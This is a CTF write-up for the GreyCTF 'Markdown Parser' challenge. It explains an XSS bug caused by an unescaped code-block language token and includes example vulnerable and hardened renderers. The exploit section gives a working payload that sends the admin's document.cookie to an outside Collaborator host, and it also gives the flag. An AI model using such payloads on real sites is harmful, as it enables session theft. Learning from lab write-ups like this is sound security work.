Markdown Parser

Challenge Description

I built this simple markdown parser. Please give me some feedback (in markdown), I promise to read them all. Current features include: bold, italics, code blocks with syntax highlighting!

Author: ocean

http://challs.nusgreyhats.org:33335

https://storage.googleapis.com/greyctf-challs/dist-markdown-parser.zip


Code Analysis

Looking at the site, it seems to be relatively straightforward: just a markdown parser.

Markdown parsers are known to be vulnerable to XSS without proper sanitization and escaping, since they reflect your input back as HTML, as shown below.

Looking at the code where they parse the markdown:

We can see that they check whether a line starts a code block, as indicated by ```.

If it is a code block, the language token that follows the backticks is appended onto the htmlOutput. Note that they also attempt to perform sanitization through the escapeHtml function when the text is not inside a code block.

The function replaces ampersand, greater than, less than, double quotes, and single quotes with their respective HTML entity codes. However, in line 18, we noticed that the language was appended onto the htmlOutput without any escaping.
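To make the bug concrete, here is an added example (not the challenge's source code) that mirrors the behaviour described above: an escapeHtml matching the five replacements the writeup lists, a fence renderer that drops the language token straight into the class attribute, and a hardened renderer that restricts the token to an allowlist and escapes it. The `class="language-…"` layout and the allowlist regex are assumptions for this example.

```javascript
// Added example mirroring the writeup's description; not the challenge's code.

// escapeHtml as described: &, <, >, " and ' become HTML entities.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the language token after ``` is concatenated unescaped,
// so a token containing "> breaks out of the attribute into markup.
function renderFenceVulnerable(lang, code) {
  return `<pre><code class="language-${lang}">${escapeHtml(code)}</code></pre>`;
}

// Hardened (assumed allowlist, our choice): accept only a short identifier,
// and still escape it on output so the attribute cannot be terminated early.
const LANG_RE = /^[A-Za-z0-9_+#.-]{0,32}$/;
function renderFenceSafe(lang, code) {
  const safeLang = LANG_RE.test(lang) ? lang : '';
  const cls = safeLang ? ` class="language-${escapeHtml(safeLang)}"` : '';
  return `<pre><code${cls}>${escapeHtml(code)}</code></pre>`;
}

// Minimal fence splitter: returns {lang, code} for the first ``` block
// (a missing closing fence runs to end of input), or null if there is none.
function firstFence(md) {
  const m = md.match(/```([^\n]*)(?:\n([\s\S]*?))?(?:```|$)/);
  return m ? { lang: m[1].trim(), code: m[2] || '' } : null;
}

function render(md, hardened) {
  const f = firstFence(md);
  if (!f) return escapeHtml(md);
  return hardened ? renderFenceSafe(f.lang, f.code)
                  : renderFenceVulnerable(f.lang, f.code);
}

// Constructed input: the writeup's proof-of-concept line used as the fence opener.
const POC = '```"> <script>alert(document.domain)</script>';
console.log(render(POC, false)); // attribute closed early, live <script> emitted
console.log(render(POC, true));  // token rejected: <pre><code></code></pre>
```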

After parsing the markdown, we can then submit it to the admin bot at the /feedback endpoint. Now that we have dissected the application, we are able to attempt to exploit the potential cross-site scripting that was identified.


Exploit

Firstly, we used <script>alert(document.domain)</script> as a proof of concept that we are able to perform XSS.

Payload
```"> <script>alert(document.domain)</script>

We are able to get the XSS working.

So let's modify our payload to try and steal the admin cookie.

Payload
```"> <script>fetch('http://d9nzvl3vlaa0mvl0ixdml5g4zv5otjh8.oastify.com', {method: 'POST', mode: 'no-cors', body:document.cookie }); </script>

I used Burp Suite Collaborator to receive the request, and Burp Suite Repeater to send it.

After waiting for a bit, I managed to receive the request in Collaborator, and was able to retrieve the flag successfully.

Flag: grey{m4rkd0wn_th1s_fl4g}
